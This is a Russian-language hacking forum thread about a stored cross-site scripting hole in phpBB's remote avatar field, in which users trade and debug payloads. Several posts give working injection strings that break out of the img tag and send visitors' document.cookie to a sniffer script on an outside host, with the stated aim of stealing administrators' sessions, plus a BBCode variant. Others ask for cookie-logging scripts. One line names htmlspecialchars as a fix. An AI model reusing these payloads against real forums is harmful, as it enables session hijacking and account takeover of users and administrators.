XSS в phpBB
 

йопт!! запарился уже... мож потому и не могу решить проблему, что она слишком легкая :confused:
Короче так, на форуме phpBB есть возможность вставлять аватар со своего url , решил проверить на дырочку, и вписал туда javascript:alert();
в ответ получил:
<img src="javascript:alert();" alt="" border="0" />
идем дальше...
решил проверить на окончание *.jpg , вписав x.jpg и получил:
<img src="x.jpg" alt="" border="0" />
затем проверил вписав x.ru x=`x.jpg получил:
<img src="x.ru x=`x.jpg" alt="" border="0" />
и т.п.
Вопрос вот в чем: пишу вместо картинки снифер (http://antichat.ru/cgi-bin/s.jpg) и он прекрасно его ловит, однаком не нужны куки всех, у кого грузится страница с моим аватором, все перепробовал, но нифига не получается :mad: Помогите плзз... :(

Приведи код, который ты вставляешь в форум.

поэтому и спрашиваю, как код оформить?? Дело в том, что форум съедает любые варианты, т.е. что бы не писалось в поле ссылки на аватар - все будет отображаться как картинка, например:
пишем в поле bla-bla-bla
получится <img src="bla-bla-bla" alt="" border="0" />
пишем javascript:alert(document.cookie)
и при загрузки страницы нам открывается alert окно в котором наши куки, а в html-тегах видим <img src="javascript:alert(document.cookie)" alt="" border="0" />
Словом, все, что бы Мы не писали в графе аватара, форум будет съедать как картинку <img src="наш текст">
Вот Я и спрашиваю, как мне вместо отображения document.cookie у юзера отдать запрос сниферу, что бы он их словил, а у юзера ни чего не отображалось?? Многое пререпробовал, но результат один и тот же - снифер ловит opener.location (url на котором находится юзер), то бишь адрес, откуда был вызван снифер, а не document.cookie - его куки...
Потенциальная дырка есть, но ее нужно оформить!! Есть идеи?! ;)

Ура-а-а-а-а-а!!!!!! Решение найдено!! :cool: ;) :p

Короче так... :cool:
Есть в phpBB такая хреновина, как аватар и там нет фильтра на спец символы, а это нам позволяет делать все, что вздумается ;) Инфы об этом XSS ни где не встречал, поэтому можно считать новой :rolleyes:

XSS такой:
http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)
где [target] - url на реальную картинку
localhost - url снифера

В ответ от сервера получаем в html-тегах:
<img src="http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)" alt="" border="0" />

таким образом грузится картинка, не доставляющая жертве (ею может быть админ) ни каких неудобств, в то время как его куки уходят к сниферу :rolleyes:

з.ы. кто первый - тот и пускай пишет ролик для видео.античат.ру , тока просьба указать, что эту ни кому не приметную багу нашел zFlex.
С ув., Йа ))

Мля мля неработает ... Как именно вставить в сообщение на форуме эту штуку ??

Блин,ты че глупый,какой нафиг сообщение в форуме...это вставляется в АФАТАР!!!т.е. когда регаешься или редактируешь свой акк,там пишешь,где url: http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)?


P.s.: я могу написать видео...

Обломчик,на большенстве серверов стоит блок 8)

А где скрипт взять, который записывал бы их в отдельное файло ? У меня есть но они неканают или я чё то неправельно делаю....
и ещё

Дак вот как привельно составить эту строчку и почему у меня это дело всё неработает ... ваще Шляпа какая то :| :mad:

Парни помогите или дайте ссылку на мануал ..... нужно ... или оправте скрипт и ссылку на мыло alien51@yandex.ru заранее спасибо.

Вот пример:
Кто будет писать видео, просьба написать, что уязвимость нашел Mr. Iron (icq # 9170797)
Самое простое решение против этого XSS - это htmlspecialchars()
;)

да прикольно..

Плохо что максимум что можно с этого взять это базу пользователей

Кстате,под эту уязвимость не попадает Phpbb 2.0.11 ....
если я не прав... заделитесь ссылочкой Icq:937843

Тока зря все эти шаманские танцы с .source.replace(/x/g,String.fromCharCode(47))
Это можно сделать намного проще:
:D

урааааааааа Работает даже на версси PHPBB 2.0.11

plunul eto:
document.writeln (
"<a target=_blank href='http://ad.strict.tbn.ru/bb.cgi?cmd=go&r=r_ssi" +
"&vbn=353&pac=2836328&pnm=7&bac=69735877&bnm=2&ref =http%3A%2F%2Ftattoo%2Efani%2Eru%2F&loc=&htr=http% 3A%2F%2Ftattoo%2Efani%2Eru%2Fgallery%2F'>" +
"<img src='http://195.161.118.159/69735/69735877_2.gif' border=0 width=468 height=60 alt=\"TBN -- The Banner Network\" title=\"TBN -- The Banner Network\"></a>"
);

И куда сохраняется файл с Хешами ???

Вот вот где путь то на скрип и какой должен быть скрипт ... ??

Ой ли. У меня на форуме кавычки спокойно квотируются:
<img src="http://avatar.com/x.jpg&quot; bb=&quot;http://antichat.ru

А так проходит?

такая длинная конструкция - нет :)
<img src="http://aaa.bb/x.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:documen" alt="" /><br />

Да и админы уже года 2 IE не юзают :cool:

загнал в аватар тестовую строку
<img src="http://abc.ru/x.gif` style=`background:url(javascript:alert())" alt="" border="0" /><br /><br />

в IE не отработало

Он и не сработает ... Я что-то перемудрил по ходу дела....
По идее, сработает он в таком случае:
Но т.к. кавычки преобразуются, то он тоже не сработает ...)
Сейчас подумаем еще ...

вот смотрю на вас и не знаю че сказать...

Как бы Егор меня не путал, по идее оба скрипта синтаксически верны:
И вот в чем была моя ошибка и чего я не учел:
Аватара отображается как
И само собой разумеется, что я предложил синтаксически неверно (в нашем случае):
Все это преобразуется в <img src=" http://www.smailiki.nm.ru/lam/lam4.gif` .... ... что является галиматьей полной и естесственно не сработает ...
Получается - раз кавычки преобразуются в &quot; , то за пределы <img src="... никуда не выйти ...

Извиняюсь за свою ошибку - просто я не вчитался в тему ...

Ничего, со всякими случается.

Не работает...
пишет:
Файл по указанному вами Url не содержит данных
чё не так?...

да, попадается...
может на новых версиях не рубит фишка?

Дак а какой вариант верный??? :)

[COLOR=http://aaa.aa/=`aaa.jpg]` style=background:url(javascript:document.images[0].src="http://www.sniffsite.ru/sniff.php?"+document.cookie) [/COLOR]

вставить можно на некоторых форумах, названия не скажу, эта информация недоступна для таких бухал как ты...

Нда ... круто!!!

скоро бои устраивать будем =))
да не, чел нормльный вроде, вот как закончит прикалываться, можно даже общаться с ним....

Речь шла о пхпбб, а не о Инвизион.

wj, прикрыли твои уязвимости в пхпбб. пора новые делать, пусть 20 ю выпускают. )) когда первые заплатки написали, все проходило в другом регистре (URL). а теперь не прокатывает. хотя не знаю как в других форумах, а в пхпбб все хсс можно через админку прикрыть, не меняя кода. но этого никто не делал.

Знаю что прикрыли, по этому Я уже прибежал на помощь. Замените мой второй тег урл, на тег мыла.

Так же есть уязвимость в теге картинки.